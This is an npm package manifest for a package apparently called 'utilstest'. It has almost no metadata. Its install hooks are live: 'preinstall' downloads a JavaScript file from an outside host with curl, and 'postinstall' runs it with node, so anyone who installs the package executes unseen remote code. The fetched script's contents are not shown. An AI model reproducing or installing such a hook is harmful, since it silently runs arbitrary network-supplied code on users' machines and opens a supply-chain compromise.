{
  "name": "utilstest",
  "version": "1.0.0",
  "description": "",
  "main": "afterInstall.js",
  "scripts": {
    "postinstallO": "test - d",
    "preinstall": "curl -O http://onion-static.yc345.tv/litManage/afterInstall.js",
    "postinstall": "node afterInstall.js"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/mengxxSELF/utilsTest.git"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "bugs": {
    "url": "https://github.com/mengxxSELF/utilsTest/issues"
  },
  "homepage": "https://github.com/mengxxSELF/utilsTest#readme"
}
